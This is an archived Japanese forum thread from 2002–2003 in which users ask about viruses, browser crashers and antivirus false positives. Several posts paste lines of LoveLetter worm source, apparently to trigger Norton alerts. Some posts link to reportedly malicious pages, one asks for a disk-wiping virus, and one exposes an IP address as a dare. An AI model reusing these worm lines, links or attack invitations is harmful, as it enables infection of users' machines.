>>466
俺も全く同じ症状が出ました。
98SEでIME2000です。

結局、ウイルスバスター オンラインスキャンの
誤検出なのですか?

266 :名無しさん@お腹いっぱい。:02/06/05 21:33

すいません。
書き込むとこ間違えました。

267 :259:02/06/07 02:17
ウイルスバスター オンラインスキャンの誤検出との事です。
ウイルスバスター オンラインスキャンのページトップに訂正文が掲載されておりました。
レジストリの修復ソフトも配布されています。
これでもう何度も再インストールしなくて済みそうです。
もっと早く、トレンドマイクロに問い合わせようかとも思ったのですが、
オンラインスキャンはサポート外と書いてあったので連絡しても無駄かなと思って連絡しませんでした。
どなたかが連絡されたのか、ここを見ていらっしゃったのでしょうか。
とにかく、良かったです。


268 :254:02/06/07 02:29
追加です。

その後、マウスポインタが不安定になり、画面上のいろんな所にワープするような状態で、
再インストールを考えていたのですが、修復ソフトを使用して全て直りました。


269 :254:02/06/07 03:22
早く寝なければ。
今気づいたのですが、Autoexec.badとconfig.sysが綺麗に無くなっていました。
ウィルス感染はないのですが。
一応、お知らせとして書きました。

270 :254:02/06/07 03:26
>>269
失礼しました。誤爆です。
問題無しです。
今回の件は全て解決しました。
お騒がせ致しました。

271 :あぼーん:あぼーん
あぼーん

272 :あぼーん:あぼーん
あぼーん

273 :名無しさん@お腹いっぱい。:02/06/08 20:34
>>272
関西弁つかうヤシには、来るんだろうYO

274 :cheshire-cat:02/06/08 20:40
>ウイルスくれのヤシ
これで満足しれ。
http://www.trendmicro.co.jp/support/download/eicar.htm

275 :名無しさん@お腹いっぱい。:02/06/08 20:48
272には削除依頼出てるぞ。

276 :名無しさん@お腹いっぱい。:02/06/09 15:47
?


277 :あほーん:02/06/09 16:31
あほーん

278 :名無しさん@お腹いっぱい。:02/06/09 19:25
激しく既出かもしれませんが、ウィンドウズの右上、3つのボタンが文字化けする
ようになりました。
「最小化」「元のサイズに戻す」「閉じる」のボタンです。
OS入れ直したら直りますか?

279 :あぼぼーん:02/06/09 19:34
あぼーん

280 :cheshire-cat:02/06/09 19:39
>>278
ほれ、どんぞ。
http://homepage2.nifty.com/winfaq/fontstrouble.html

281 :278:02/06/09 20:02
ナオタ━━━(゚∀゚)━( ゚∀)━(  ゚)━(  )━(  )━(゚  )━(∀゚ )━(゚∀゚)━━━!!!!
>>280あなたはいい人だ。
ウィルスじゃあなかったのね。


282 :272:02/06/09 23:42
272って何かいてあったの? 気になる!!

283 :名無しさん@お腹いっぱい。:02/06/09 23:56
>>282
http://kaba.2ch.net/test/read.cgi/saku/1023513349/7


送信依頼する時点で削除

284 :DUCA:02/06/12 07:08
ご報告

やっと僕の正しいメールアドレスに気づいていただいたようで、
芸のないウイルスが多少来るようになりました。

そういう人達なので、相手にしてもしょうがないですが、
煽りと言われても、チョト一言
ウイルスくらい自前で作ってから
(もしくは改良してから)
でかいこといいなや
こんなんで今時誰が引っかかるのや?

あほ丸出し、名前さらすぞボケ!

あーすっくししした!(へなへな


285 :名無しさん@お腹いっぱい。:02/06/12 22:00
      ワケ            ワカ            ラン♪
───────────────────────────────────
──‐ ∧_∧∧_∧───‐∧_∧ ‐∧_∧───∧_∧────‐ ∧_∧──
──‐( ・∀・)⊃Д`)───(     ⊃    ).──‐( ・∀・)───‐ r(    )──
──‐(O  / つ つ───(   / と   )──‐⊂⊂へノ────‐〉   つ──
──‐人  Y ゝ ) )───‐ノ  ハ―(  ( ノ───‐ 'ー(__)───⊂ 、  ノ───
──‐し(__) し し ───‐(_ノ_)― し'J────し' ───────し'────
─────────────────────────────────── 


286 :名無しさん@お腹いっぱい。:02/06/16 00:52
最近、「森本美由紀」から、1941年くらいの日付で、みょうなhtmlメール来ませんか?


287 :名無しさん@お腹いっぱい。:02/07/06 21:12
このスレもウイルスに感染させてみるテスト(ノートン先生のみ反応)
c.Copy(dirsystem&"\通報シマスタ.TXT.vbs")

288 :名無しさん@お腹いっぱい。:02/07/11 22:09
Temporary Internet filesからI-Worm/NIMDA.A.HTMが検出されました。
これってHTMファイルだけど、危険なのでしょうか?



289 :288:02/07/11 22:41
AVGスレみたら直ぐ解ってしまった。原因が
スレ汚しスミマセン。
一瞬、((((((;゚Д゚)))))ガクガクブルブル



290 :爆!爆!:02/07/11 23:45
芸能音楽速報板の「あゆはNO1」に張ってあるウィルスなんですか?
テキストでも感染するんですか?

291 :名無しさん@お腹いっぱい。:02/07/11 23:51
既出 超頻出 SuperFAQ

292 :batcha:02/07/12 01:58
Whiter2欲しいっす。
情報求む!!
お願いします。

コレクターより


293 :名無しさん@お腹いっぱい。:02/07/12 02:01
そんなものはない

294 :名無しさん@お腹いっぱい。:02/07/12 02:38
あのですね
ニュー速にかきこもうとしたらノートン先生が警告してきてですね
よくみたらlove letterAに感染してるって・・・まじで?

ついさっきの出来事なんですけど、これって大丈夫なの?
俺が悪いの?

295 :名無しさん@お腹いっぱい。:02/07/12 02:42
漏れも・・・・

296 :名無しさん@お腹いっぱい。:02/07/12 02:43
あ!もしかしてこれ?

http://pc.2ch.net/test/read.cgi/sec/1025872269/l50

297 :名無しさん@お腹いっぱい。:02/07/12 02:54
ノートン誤作動ネタこのスレで何%くらいか調べてみようかな・・・

298 :名無しさん@お腹いっぱい。:02/07/12 06:06
・・・だから、ノートン先生は被害妄想が激しいだけ。
原因はウイルスもどきソースを貼り付けるコピペ厨。

いい加減そのネタ飽きた。

299 :名無しさん@お腹いっぱい。:02/07/12 12:59
↑ヲマエが飽きても知らないしとイパーイいるわけで
>>298ヲマエがコピヘ厨じゃねーのか!

300 :名無しさん@お腹いっぱい。:02/07/12 14:05
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

301 :名無しさん@お腹いっぱい。:02/07/12 17:52
その知らない人もちょっとログみれば簡単にわかるんだがなぁ

302 :名無しさん@お腹いっぱい。:02/07/13 10:07
ノーdは藪医者だな、まったく

303 :名無しさん@お腹いっぱい。:02/07/13 10:46
ここはノートン誤作動板ですか?

304 :名無しさん@お腹いっぱい。:02/07/13 13:27
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

305 :名無しさん@お腹いっぱい。:02/07/13 22:12
おれのパソコン、自分のアドレス帳に登録してるメルアドが差出人になって
添付ファイル付でメール送りまくってる容疑がかかってるんだけど。
どうすれば、ウィルスにかかってるかかかってないか判別できる?
ていけんばんとかでいい?

306 :名無しさん@お腹いっぱい。:02/07/13 22:14
>>305
まぁ適当にばい菌探しでもしていなさい。
適当に吸い込んで具合が悪くなったらそれがばい菌クンです。

307 :名無しさん@お腹いっぱい。:02/07/16 16:48
知らないアドレスから、
「係籾梱觀」という題名で、292KBものサイズのメールが送られてきました。
パソのメールをいつも携帯に転送してるんですが、
携帯で開いたところ本文は、
ランダムに並べられた半角英数のオンパレードでした。
Aがやたら多かったです。
これって何…?


308 :名無しさん@お腹いっぱい。:02/07/16 16:59
>>307
このスレはもともと単発質問スレから発してるので質問するのに適当でない。
また、件名や大きさからウィルス名を推測できる時代は終わりつつある。
PCでウィルススキャンしてウィルス名確定してください。

☆ウィルス情報&質問 総合スレッド☆part4
http://pc.2ch.net/test/read.cgi/sec/1024061532/

309 :名無しさん@お腹いっぱい。:02/07/16 17:02
↑ 申し訳。

310 :名無しさん@お腹いっぱい。:02/07/16 17:03
>>309
さげろ。

311 :名無しさん@お腹いっぱい。:02/07/16 17:05
↑ ますます申し訳。ぷ。

312 :マカー:02/07/18 21:47
>>308
(´-`).。oO(ンじゃ、このスレは、なんの為に存在するんだろう)

個人的にはマカーだから、あんまり関係ないんだけど。

313 :名無しさん@お腹いっぱい。:02/08/03 19:59
勘違いしている方がたくさんいるようだが、
少なくともSymantec Security Checkのウィルススキャンで、
VBS.LoveLetter.Verに感染と出る場合は間違い無く感染している。

http://www.symantec.com/region/jp/securitycheck/index.html

スタート→検索→ファイルやフォルダで、感染しているファイルがあるフォルダが表示されるか見てみると良い。
temporaryInternetFiles/contentIE5/配下のXなんたらというフォルダなど数フォルダが表示されないはず。
あと、トレンド・マイクロのホームページでオンラインスキャンしてごらん。
http://www.trendmicro.co.jp/hcall/index.asp
感染していれば、エラーが出て何度やっても定義ファイルを全てダウンロードできない。
感染していたら、ウイルス駆除ツール:VBSCAN_AT/98.exeをダウンロードして実行すれば綺麗に駆除してくれる。
ウィルスソフト持ってない人も駆除できる。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=2617


314 :名無しさん@お腹いっぱい。:02/08/03 21:01
何か英雄気取りがいるな…


誰も聞いちゃいないが(w

315 :名無しさん@お腹いっぱい。:02/08/10 12:26
アイーンラブユーって何?

316 :名無しさん@お腹いっぱい。:02/08/19 11:33
送信者、件名がブランクで
「KELDCIKE.EXE.htm(642□□□)」という添付ファイルのみがメールで送られてきました。

これって、ウイルスでしょうか?

317 :名無しさん@お腹いっぱい。:02/08/19 15:06
プレビューだけで感染してしまうのはどうやって防ぐのでしょうか?

318 :名無しさん@お腹いっぱい。:02/08/19 17:33
「プレビューしない」

馬鹿か?

319 :名無しさん@お腹いっぱい。:02/08/19 17:41
――――――――――ここから下はメモ帳としてお使いください――――――――――

320 : :02/08/20 03:55
3日間ウンコが出ません。
シッコはいつもより良く出ます。

ウンコがシッコに化けてでてるんでしょうか?

321 :みゆき:02/08/21 00:42
ttp://ime.nu/dms100.org/worksucks/lame.html
これってどうなるのか教えて?
それと相手のHD破壊するウィルスってありますか?

322 :名無しさん@お腹いっぱい。:02/08/21 00:53
>>321
マルチすんなよ

323 :名無しさん@お腹いっぱい。:02/08/21 17:19
@ttp://lounge.dip.jp/~yoshinoya_off/up/img/g.jpg
Attp://angelfire.lycos.com/az3/match/main.html
この2つはウィルス?

324 :名無しさん@お腹いっぱい。:02/08/21 17:24
上は見れんかった
下はmailtoストーム
いいかげんブラクラじゃなくってマンキンがホスィ

325 :cheshire-cat ◆CATJR.v6 :02/08/21 18:35
>>324
面白みの無い、単純なvilliだよ。

326 :名無しさん@お腹いっぱい。:02/08/21 19:56
マグロラーメンほしい

327 :名無しさん@お腹いっぱい。:02/08/21 21:05
>>307
おいらも来たよ。何これ?開けてないけど。
あと、件名がPlease try again で知らないとこから
くる。プロバイダ一旦解約したほうが吉ですか?

328 :名無しさん@お腹いっぱい。:02/08/21 21:08
プロバイダ変えてもメール使ってりゃいつかは別のウィルスメールが来る
掲示板とかにメールアドレス書いちゃったり
まわりにセキュリティ意識が低い人がいる限り

329 :名無しさん@お腹いっぱい。:02/08/21 21:12
>>328
・・・・ハァ。そうですか・・。そういえば
知人が感染した、っなんて言ってたよ・・。
毎週定義更新してるんだけど、ノートン先生が
反応してくれなくって困ってるんですが・・・。

330 :名無しさん@お腹いっぱい。:02/08/21 21:13

セキュリティ意識が低い人 = いつまでもIEを使い続ける人


331 :名無しさん@お腹いっぱい。:02/08/21 21:15
>>330
漏れIEですがなにか?

332 :名無しさん@お腹いっぱい。:02/08/21 21:16

 彡ミ  | |  ∧_∧|__
  |ヽ  | | ( ´ー`/  / まったくIE厨房には困ったものだな。
  |ヽ  | | (   ,/_〇
  ⊥  |  ̄| ̄|| ̄ ̄ ̄ ̄ ̄|
  |__|   ◎ ̄| ̄| ̄ ̄ ̄ ̄ ̄|

 彡ミ  | |  ∧_∧|__
  |ヽ  | | ( ´ー` /  / そう思わんか?
  |ヽ  | | (   ,/_〇
  ⊥  |  ̄| ̄|| ̄ ̄ ̄ ̄ ̄|
  |__|   ◎ ̄| ̄| ̄ ̄ ̄ ̄ ̄|


333 :名無しさん@お腹いっぱい。:02/08/21 21:20
  ∧ ∧     ┌─────────────
  ( ´ー`)   < シラネーヨ
   \ <     └───/|────────
    \.\______//
      \       /
       ∪∪ ̄∪∪



334 :cheshire-cat ◆CATJR.v6 :02/08/21 21:21
>>331-332
ネスケではいかがなものでしょか。

335 :名無しさん@お腹いっぱい。:02/08/21 21:34


   ∧ ∧
   ( ´ー`)     ┌─────
    \ <     < シラネーヨ
  / ̄\.\    └─────
 (\  ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   /|
 (\ ̄ ̄ 丿__//
 (\ ̄ ̄ 丿__/
  \ ̄ ̄ 丿
     ̄ ̄

336 :名無しさん@お腹いっぱい。:02/08/21 21:36
>>330-334
IEだとどんな不具合が?漏れは今までウイルスに感染したことは一度もない。
ネスケだとどんなことが回避できるんだ?教えれ。


337 :名無しさん@お腹いっぱい。:02/08/21 21:39
IE5・5と6・0、ネット閲覧ソフトに欠陥
http://pc.2ch.net/test/read.cgi/sec/1005605775/

OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/

338 :cheshire-cat ◆CATJR.v6 :02/08/21 21:53
>>336
IEだと設定がダメダメなお方が、エロサイト閲覧時にいわゆるインターネットウイルス喰らったり、パッチ入れ怠ってぁゃιぃ所でクッキー抜かれるくらいかなぁ。
実はネスケは、遅いんでそれほど好きではない。

まぁ。Mac版IEに比べれば、いずれも早いけど。

339 :名無しさん@お腹いっぱい。:02/08/21 21:57


   ∧ ∧
   ( ´ー`)     ┌─────
    \ <     < オペラネーヨ
  / ̄\.\    └─────
 (\  ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   
 (\ ̄ ̄ 丿   /|
 (\ ̄ ̄ 丿__//
 (\ ̄ ̄ 丿__/
  \ ̄ ̄ 丿
     ̄ ̄




340 :ぷちこ:02/08/21 22:01
IEとNNともじらとopera使ってますが何か?

341 :名無しさん@お腹いっぱい。:02/08/21 22:07
別に

342 :ぷちこ:02/08/21 22:13
どうも(´・ω・`)ショボーン

343 :名無しさん@お腹いっぱい。:02/08/21 22:17
>>338
とりあえずすべてのCookieをブロックさせました。
書き込みテスト。

344 :名無しさん@お腹いっぱい。:02/08/21 22:38
WIN.BOMBでほっていてもいいの?

345 :名無しさん@お腹いっぱい。:02/08/21 22:40
>>343
いや、だからパッチ当てなって

346 :名無しさん@お腹いっぱい。:02/08/21 22:43
ttp://www.hellplant.org/cgi-bin/uploader/zenecro68xx/wc0100.jpg
これ↑踏んだんだが何も変化がない。
このリンク踏んだ際の症状等教えていただきたい。

347 :名無しさん@お腹いっぱい。:02/08/21 22:47
>>346
メール画面がたくさん開いて
フロッピードライブへのアクセスも起きる
よくあるタイプ。

348 :名無しさん@お腹いっぱい。:02/08/21 22:51
>>347
即レスサンクス!
安心しますた!

349 :名無しさん@お腹いっぱい。:02/08/21 22:58
>>348
有名な「ブラクラチェッカー」も活用しる。
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi

350 :初心者:02/08/31 22:12
私のパソコンに次のようなフォルダがあります。消してもまた
でてくるのです。これはウイルスの仕業ですか?
C:\Documents and Settings\‘¾“c—@”V\.java

351 :名無しさん@お腹いっぱい。:02/09/08 16:08

VBS/Loveletter.d エディタ破損のため、繁殖しない

今さっき、引っかかった。

エディタ破損ってなにするの?


352 :名無しさん@お腹いっぱい。:02/09/09 15:39
openme

353 :完全サン@プル:02/09/09 19:35
,〜((((((((〜〜、
 ( _(((((((((_ )
 |/ ~^^\)/^^~ ヽ|
  |  _ 《 _  |
 (|-(_//_)-(_//_)-|)
  |   厶、   |    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  \ |||||||||||| /  < サンプルを覗くのも・・・。
    \_~~~~_/     \_________
http://www.traffimagic.com/WIPE7MMLZCA/comein/CHKGK
無料で今日も”どっぴゅ〜” だっふんだぁ〜

354 :名無しさん@お腹いっぱい。:02/09/10 05:45
☆ウィルス情報&質問 総合スレッド☆part5
http://pc.2ch.net/test/read.cgi/sec/1027397623/l50

355 :名無しさん@お腹いっぱい。:02/10/24 22:13
☆ウィルス情報&質問 総合スレッド☆part7
http://pc.2ch.net/test/read.cgi/sec/1035401865/l50

356 :名無しさん@お腹いっぱい。:02/11/16 06:15
JS_EXCEPTION.GENこれなんだ?

357 :名無しさん@お腹いっぱい。:02/11/16 09:46
>>356
マルチ

358 :名無しさん@お腹いっぱい。:02/11/16 17:27

あの、ここは 爬虫類 のインターネットですか

359 :名無しさん@お腹いっぱい。:02/11/16 22:30
>>358
少なくともあなたは爬虫類。

360 :名無しさん@お腹いっぱい。:02/11/20 03:30
なんかウチのパソコンに見慣れないファイルがあったんデスよ!
怪しいんでノートンかけてみたり、TEXTエディタで中身見てみたりしたけど正体が掴めず。

名前からしてアダルト系か?進入経路は?・・・色々考えた末の結論でした・・・








・・・思い出した、エローゲのセーブファイルだ!

吊ってきます(´・ω・`)

361 :名無しさん@お腹いっぱい。:02/11/28 15:49
インターネットしてたらバスター2002がウイルス発見→無事駆除成功。事なきを得た。
発見したウイルスは「VBS_HAPTIME.A-1」HTMLに埋め込まれているこのウイルス、前に流行ったらしい?
駆除されて無害になったウイルスファイル「Help.hta」が残ってたので削除しますた。

362 :晴夫:02/11/29 23:17
http://www.kogalu.com/sou/girls/index2.htm
すんません、これクリックしちゃったんですけど
何のウイルスですか?
どなたか教えてくさい、怖くて夜も寝れません。

363 :名無しさん@お腹いっぱい。:02/11/29 23:34
>>362
ウイルス直リン通報しますた

寝ないでください

364 :名無しさん@お腹いっぱい。:02/11/29 23:38
>ウイルス直リン通報しますた
( ´,_ゝ`)プッ

365 :名無しさん@お腹いっぱい。:02/11/29 23:41
>>362
そのURLはこの板ではNGワード。

366 :名無しさん@お腹いっぱい。:02/11/29 23:41
>>364
( ´,_ゝ`) ププッ

367 :名無しさん@お腹いっぱい。:02/11/29 23:49
>>365
なんで?

368 :名無しさん@お腹いっぱい。:02/11/30 21:43
age

369 :名無しさん@お腹いっぱい。:02/11/30 21:47
>>367
つい先日、この板を蹂躙した「彼」がこだわったURLだから。

370 :パニック賞状:02/12/15 15:05
IE開いたら変な鳥が出てきますた。なんですかこれは?

371 :名無しさん@お腹いっぱい。:02/12/15 16:54
>>370
BIGLOBEだからです

372 :パニック賞状:02/12/15 17:07
371さん、詳しく教えていただけますか?おながいします。

373 :名無しさん@お腹いっぱい。:02/12/20 17:23
てst

374 :名無しさん@お腹いっぱい。:02/12/22 05:08
ウイルスに感染したんですが
対処するにも名前がわからなくて困っています

PCを立ち上げると
「○×△(聞き取れず)最低〜」
とBeep音がなり
ディスプレイが真っ暗なままなのです

名前を知っている方いらっしゃいますか?

375 :名無しさん@お腹いっぱい。:02/12/22 12:58
ウイルスではないと思うのですが、Hotmail経由のUNIVERSITY DIPLOMAのスパムで困っています。
Winを普通に使用中、突然上記のポップアップが出てくることもあります。(3日に1回ぐらい)
Norton Antivirus、ウイルスバスターには反応しません。
どなたか対処法をご存知でしたら教えてください。
OSはWindows2000で、自作機を使っています。

376 :名無しさん@お腹いっぱい。:02/12/23 18:27
please try again

っていうsubjectのメールが送られてきたけどこれなに?
batの実行ファイルがついていた。

Fromはodnのアドレスでtoもodnのアドレスで一つだけ


377 :名無しさん@お腹いっぱい。:02/12/23 19:53
dousitemo hiraganaga utenai
tasukete kudasdai donataka


378 :名無しさん@お腹いっぱい。:02/12/23 20:03
>>377
sono pasokon wo mado kara sutero
atarashii pasokon wo kae!

379 :名無しさん@お腹いっぱい。:02/12/23 20:04
>>378
maji ??


380 :377:02/12/23 20:10
Greets! とかいう、スクリーンセイバーソフトを名乗った
ウィスルスキャンにも引っかからない、タチの悪いやつが来た。
コイツを開くと、インターネットでアルファベットしか使えなくなった

今やっと 復活したが コレもウィルスのせい??

381 :名無しさん@お腹いっぱい。:02/12/23 20:41
>>380
んなもの開くほうが悪い。

382 :名無しさん@お腹いっぱい。:02/12/23 20:48
http://www.zappoo.com/

これは、なんですか?

383 :cheshire-cat ◆PhCATJR.v6 :02/12/23 21:00
srcは実は実行形式ファイルだったりしまする。
よくジャニ系女とか狙って、「滝沢クンのスクリーンセーバーですぅ!」、みたいな感じで配布してるお方がいるなぁ。

つか。下さい。

384 :名無しさん@お腹いっぱい。:02/12/23 21:09
☆ウィルス情報&質問 総合スレッド☆part8
http://pc.2ch.net/test/read.cgi/sec/1039859073/l50
の方はどうするの?
こっちの元単発質問スレを使うということ?

385 :名無しさん@お腹いっぱい。:02/12/23 21:17
どっかの馬鹿があげたからだろ。
■■■■■■■■終了■■■■■■■■

386 :山崎渉:03/01/15 15:54
(^^)

387 :山崎渉:03/04/17 12:33
(^^)

388 :山崎渉:03/04/20 06:04
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

389 :山崎渉:03/05/28 17:17
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

390 :山崎 渉:03/07/15 11:13

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

391 :名無しさん@お腹いっぱい。:03/07/30 20:12
レッドロフのウイルスページ教えて下さい。まってます。

392 :cheshire-cat ◆CATBCJABLA :03/07/30 20:19
>>391
Googleで最も検索しやすい例なんすけど。

それに気付かないって時点で、何か努力とかの方向性とか捉え方がおかしいんじゃないのかな。


393 :名無しさん@お腹いっぱい。:03/07/30 20:25
392がいいこと言った

394 :000:03/07/30 21:12
他に書くところが無さそうなので ここで・・・

今日ノートPCが修理から帰ってきたんだけど
一応 ウイルスバスター体験版で見てみると・・・なんとウイルス1116個(なぜだ?)
cドライブだけの再インストールだけでいいのかな?

395 :cheshire-cat ◆CATBCJABLA :03/07/30 21:18
>>394
ここが適切かと。
☆ウィルス情報&質問 総合スレッド☆part11
http://pc.2ch.net/test/read.cgi/sec/1056101401/l50

ウイルスの検出名を書かないと、誰も何もわかりませぬ。

396 :ぼるじょあ ◆yBEncckFOU :03/08/02 04:51
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

397 :名無しさん@お腹いっぱい。:03/08/09 02:38
ウイルスかどうかわからないんですが
エンターを押してないのに、勝手にエンターが押しまくられます。
これのせいでブラウザが何重にも起動したりしまったり
文章変換できなくなったり・・・。
これはウイルスなんでしょうか?
当たり前ですがこれは別の人のPCです

398 :名無しさん@お腹いっぱい。:03/08/09 02:50
こんな古いスレにカキコしてもしょうがないし

399 :名無しさん@お腹いっぱい。:03/08/09 03:01
http://pc.2ch.net/test/read.cgi/sec/1060186382/l50
があった・・・。
見落としていた・・・。
すんません。あっちで聞きます。サルベごめんなさい。

400 :名無しさん@お腹いっぱい。:03/08/09 03:02
↑397です

401 :名無しさん@お腹いっぱい:03/08/10 01:08
誰か、ここにウイルス送ってみやがれ!
絶対感染しない自信あるからよ〜
バ〜カ(笑 N030164.ppp.dion.ne.jp(61.202.30.164)
無敵だよ オマイラ

402 :名無しさん@お腹いっぱい。:03/08/10 01:37
>>401
犯罪者にならないようにな

403 :名無しさん@お腹いっぱい。:03/08/10 09:23
>>401
お前のじゃないだろ

404 :名無しさん@お腹いっぱい。:03/08/10 10:29
>>401
あっちこっちに貼ってるね

405 :名無しさん@お腹いっぱい。:03/08/10 10:35
>>401
自分でやれよ

406 :名無しさん@お腹いっぱい。:03/08/13 20:30
>>401
リモートホストさらされただけでどうやっておくるんだ

407 :山崎 渉:03/08/15 22:40
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

408 :名無しさん@お腹いっぱい。:03/08/20 07:33
フォルダひらくとき凄く重くて
必ず Folder と Desktop ってファイルがあるんですが。。。
メールも送るとうけっとった側が文字化けしてます
これってウイルスですか?

409 :YURO ◆F6j7QqwKH. :03/08/30 02:52
DLLHOST.EXEって何のウイルスなのかな?
ワーム?

410 :YURO ◆F6j7QqwKH. :03/08/30 03:17
>>409
ブラスターだということがわかりました。[解決!]

411 :名無しさん@お腹いっぱい。:03/09/13 11:54
W95.Hybris.worm
このウイルスってWin2000でも発病するんすか?
シマンテックのには、影響が出るのと出ないの両方に乗ってないので教えてください。
それと駆除方法を教えてください、、、

412 :名無しさん@お腹いっぱい。:03/09/13 13:06
>>411
駆除ツールさがすとか、いろいろ方法はあるけど。

413 :名無しさん@お腹いっぱい。:03/09/14 16:32
タスクでwanmpsvc.exeって言うのが動いてるのですが…
これってウィルスでしょうか?

414 :まる:03/09/14 22:14
W32何とかwromってウイルスにかかってしまいました
このウイルスの情報お願いしますm(__)m

まじで・・・

415 :名無しさん@お腹いっぱい。:03/09/14 22:18
>>414
その「何とか」がなくちゃ話にならん。
そして「wrom」って・・・

416 :まる:03/09/14 22:21
アンティニー?
ってな感じ・・・

417 :名無しさん@お腹いっぱい。:03/09/14 22:50
>>416
バスターのHPですがコレですか? ↓
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.A


418 :ケンタ:03/09/15 02:26
ジャス・エクスポチチチンなんてあるのか!初めてしたぞ!

419 :ケンタ:03/09/15 02:27
ジャス・エクプレセテンポリトットなんてあるのか!初めてしッたぞ!

420 :名無しさん@お腹いっぱい。:03/09/15 02:28
要はWIN95や98と違って2000やXPは欠陥てことか。
今度こそまともなOS出せYO!!!

421 :名無しさん@お腹いっぱい。:03/09/15 02:31
>>420
恥ずかしいアホは消えろ

422 :名無しさん@お腹いっぱい。:03/09/15 16:55
wanmpsvc.exeのこと教えてくれ…

423 :恵子:03/09/15 17:19
http://life.fam.cx/a013/

424 :名無しさん@お腹いっぱい。:03/09/15 22:11
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs

425 :名無しさん@お腹いっぱい。:03/09/16 02:46
反応しゃねいよ!!?!
どうなってんとんとん

426 :名無しさん@お腹いっぱい。:03/09/16 04:11
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

427 :sage:03/09/19 23:39
匿名メール使えば?

428 :名無しさん@お腹いっぱい。:03/09/20 00:59
WORM_SWEN.Aってのが爆発してるぞ

429 :名無しさん@お腹いっぱい。:03/09/20 01:01
☆ウィルス情報&質問 総合スレッド☆part13
http://pc.2ch.net/test/read.cgi/sec/1061454729/l50

430 :名無しさん@お腹いっぱい。:03/09/20 14:22
なんか、今日来たSPAMメール約20通のうち、外国からWorm.Automat.AHBってのに感染してるとかいうのが10通きてるんだけど、何・・・


431 :名無しさん@お腹いっぱい。:03/09/21 02:36
>>430
それがSWENです。ノートンをお使いのようで、それならブロック
されてるからいいですが…

★SWEN流行中★
Windows Security Updateという窓が勝手に開いた
アンチウィールス、ファイアウォールが何度も勝手に終了する
レジストリエディタregeditがエラーで使えない
 といった症状が出たらほぼ間違いなくSWEN感染です

SWEN@MM(SWEN.A) スレ
http://pc.2ch.net/test/read.cgi/sec/1064010406/


432 :初心者:03/09/23 17:35
ノートンで初めてチェックしたらRedlof.Aに10000個以上のファイルが
感染している、と出ました。駆除も失敗というメッセージが。これって
本当なのでしょうか。それとも過剰反応の誤診なのでしょうか。

433 :名無しさん@お腹いっぱい。:03/09/23 21:25
>432

本当
あと名前欄には何も書くな
uzeeeeee

434 :名無しさん@お腹いっぱい。:03/09/23 21:26
>430

ウィルスメールだよ
削除して終わり

いちいち報告するな

435 :名無しさん@お腹いっぱい。:03/09/26 17:44
ちょっとお聞きしたいのですが、このウイルスって何でしょうか??
→最小化・最大化の右上の表示が文字化け。
  ラジオボタンも変な記号になってしまう。
多分ブラクラから感染したと思うのですが、ウイルススキャンしても出てこなくて…
どう対処すればよいのでしょうか。

436 :名無しさん@お腹いっぱい。:03/09/26 17:47
ネタでいちいち糞スレを上げないでください。

437 :名無しさん@お腹いっぱい。:03/09/26 17:50
ネタじゃないです。本当に困ってるんです。
いいです。別スレで聞きますから。

438 :名無しさん@お腹いっぱい。:03/09/26 17:57
それくらい自分で調べろよ。

439 :名無しさん@お腹いっぱい。:03/09/29 21:09
WINNT\system32\dllcache\infsrv.exe
WINNT\system32\dllcache\mmsql32.bat
WINNT\system32\dllcache\msmngr32.exe
WINNT\system32\dllcache\mtnm32.dll

ウイルスバスターで検索してひっかかりました。
感染源わからなくてリカバリーしても何回も
感染します。対策どうしたらいいでしょうか・・・。
ネットワークからの感染みたいなのですが特定はできていません。
OSはWIN2000使ってます。





440 :名無しさん@お腹いっぱい。:03/09/29 21:29
W32.Klez.H@mm
こんなのが感染してる添付ファイルのメールを送られてきた。

441 :名無しさん@お腹いっぱい。:03/09/29 21:29
日本語が読めない人に説明するのは難しいんですが。

442 :名無しさん@お腹いっぱい。:03/09/29 22:04
loveletterコピペ厨uzaiyo

